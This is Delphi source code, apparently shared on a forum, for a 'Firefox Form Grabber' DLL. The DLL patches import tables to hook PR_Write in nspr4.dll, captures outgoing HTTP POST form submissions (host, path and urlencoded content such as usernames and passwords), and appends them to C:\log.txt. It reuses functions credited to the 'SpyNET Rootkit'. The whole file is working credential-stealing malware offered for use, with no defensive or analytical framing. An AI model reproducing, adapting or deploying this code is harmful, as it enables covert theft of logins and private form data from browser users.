Code:
library prjDll;
{
Title: Firefox Form Grabber
Coder: Slayer616
Description: This Dll hooks PR_Write, and grabs the Data which gets sent with "POST".
It will be saved to C:\log.txt!
Credits: Hamtaro, Aphex(some Functions taken from "SpyNET Rootkit")
}
uses
sharemem,windows,sysutils;
var
t:textfile;
oldpr_write : function(PRFileDesc : Pointer;buf : Pointer; amount : LongInt) : LongInt; cdecl;
type
TModuleList = array of cardinal;
TImportFunction = packed record
JumpInstruction: Word;
AddressOfPointerToFunction: ^Pointer;
end;
TImageImportEntry = record
Characteristics: dword;
TimeDateStamp: dword;
MajorVersion: word;
MinorVersion: word;
Name: dword;
LookupTable: dword;
end;
function FunctionAddress(Code: Pointer): Pointer;stdcall;
begin
Result := Code;
if TImportFunction(Code^).JumpInstruction = $25FF then Result := TImportFunction(Code^).AddressOfPointerToFunction^;
end;
function HookModules(ImageDosHeader: PImageDosHeader; TargetAddress, NewAddress: Pointer; var OldAddress: Pointer):integer;stdcall;
var
ImageNTHeaders : PImageNtHeaders;
ImageImportEntry: ^TImageImportEntry;
ImportCode: ^Pointer;
OldProtect: dword;
EndofImports: dword;
begin
Result := 0;
OldAddress := FunctionAddress(TargetAddress);
if ImageDosHeader.e_magic <> IMAGE_DOS_SIGNATURE then Exit;
ImageNTHeaders := Pointer(integer(ImageDosHeader) + ImageDosHeader._lfanew);;
if ImageNTHeaders <> nil then
begin
with ImageNTHeaders^.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] do
begin
ImageImportEntry := Pointer(dword(ImageDosHeader) + VirtualAddress);
EndofImports := VirtualAddress + Size;
end;
if ImageImportEntry <> nil then
begin
while ImageImportEntry^.Name <> 0 do
begin
if ImageImportEntry^.LookUpTable > EndofImports then break;
if ImageImportEntry^.LookUpTable <> 0 then
begin
ImportCode := Pointer(dword(ImageDosHeader) + ImageImportEntry^.LookUpTable);
while ImportCode^ <> nil do
begin
if (ImportCode^ = TargetAddress) and VirtualProtect(ImportCode, 4, PAGE_EXECUTE_READWRITE, @OldProtect) then ImportCode^ := NewAddress;
Inc(ImportCode);
end;
end;
Inc(ImageImportEntry);
end;
end;
end;
end;
function GetModuleList: TModuleList; stdcall;
var
Module, Base: pointer;
ModuleCount: integer;
lpModuleName: array [0..MAX_PATH] of char;
MemoryBasicInformation: TMemoryBasicInformation;
begin
SetLength(Result, 10);
ModuleCount := 0;
Module := nil;
Base := nil;
while VirtualQueryEx(GetCurrentProcess, Module, MemoryBasicInformation, SizeOf(MemoryBasicInformation)) = SizeOf(MemoryBasicInformation) do
begin
if (MemoryBasicInformation.State = MEM_COMMIT) and (MemoryBasicInformation.AllocationBase <> Base) and (MemoryBasicInformation.AllocationBase = MemoryBasicInformation.BaseAddress) and (GetModuleFileName(dword(MemoryBasicInformation.AllocationBase), lpModuleName, MAX_PATH) > 0) then
begin
if ModuleCount = Length(Result) then SetLength(Result, ModuleCount * 2);
Result[ModuleCount] := dword(MemoryBasicInformation.AllocationBase);
Inc(ModuleCount);
end;
Base := MemoryBasicInformation.AllocationBase;
dword(Module) := dword(Module) + MemoryBasicInformation.RegionSize;
end;
SetLength(Result, ModuleCount);
end;
function HookAPI(TargetModule, TargetProc:Pchar; NewProc: Pointer; var OldProc: Pointer): integer; stdcall;
var
ModuleLoop: integer;
Modules: TModuleList;
Module: hModule;
Target: pointer;
begin
Result := 0;
Module := GetModuleHandle(pchar(TargetModule));
Modules := GetModuleList;
if Module = 0 then
begin
Module := LoadLibrary(pchar(TargetModule));
end;
Target := GetProcAddress(Module, pchar(TargetProc));
if Target = nil then Exit;
for ModuleLoop := 0 to High(Modules) do
begin
if (GetVersion and $80000000 = 0) or (Modules[ModuleLoop] < $80000000) then
begin
Result := HookModules(Pointer(Modules[ModuleLoop]), Target, NewProc, OldProc);
end;
end;
end;
function SplitString(Start, Stop, ToSplit : String) : String;
var
tmp : String ;
begin
tmp := Copy(ToSplit,Pos(Start, ToSplit) + Length(Start), Length(ToSplit) - Pos(Start, ToSplit) + Length(Start));
result := Copy(tmp, 0, Pos(Stop, tmp) - 1);
end;
function StrCmp(String1, String2: string): boolean;
begin
if (lstrcmpi(pchar(String1), pchar(String2)) = 0) then begin
Result := True;
end else begin
Result := False;
end;
end;
function newpr_write(PRFileDesc : Pointer; buf : Pointer; amount : LongInt) : LongInt; cdecl;
var
dBuff,lBuff: PChar;
sTemp, sContent, sHost, sSite: String;
sLength: Integer;
begin
result := oldpr_write(PRFileDesc, buf, amount);
if (result < 2) Then exit;
//MOAR Memory
GetMem(dBuff, amount);
GetMem(lBuff, 4);
//Now Move the Buffer to our String
CopyMemory(dBuff, buf, amount);
CopyMemory(lBuff, pchar(dBuff),4);
//Only POST if usefull for us
if strcmp(lBuff, 'POST') then begin
//Extract usefull Infos
sHost := SplitString('Host: ',#13#10,dBuff);
sSite := SplitString('POST ', ' HTTP',dBuff);
sLength := StrToInt(SplitString('Content-Length: ',#13#10,dBuff));
if sLength = 0 then exit;
sTemp := Trim(SplitString('Content-Type: ',#13#10,dBuff));
if Pos('application/x-www-form-urlencoded', sTemp) = 0 Then exit;
SetString(sContent,pchar(cardinal(buf) + result - sLength),sLength);
//Write Infos to File
assignfile(t,'C:\log.txt');
append(t);
writeln(t,'Host: ' + sHost);
writeln(t,'Site: ' + sSite);
writeln(t,'Length: ' + inttostr(sLength));
writeln(t,'Content: ' + sContent);
writeln(t,'-----------------------------------------------');
flush(t);
CloseFile(t);
end;
end;
begin
hookapi('nspr4.dll','PR_Write',@newPR_Write,@oldPR_Write);
end.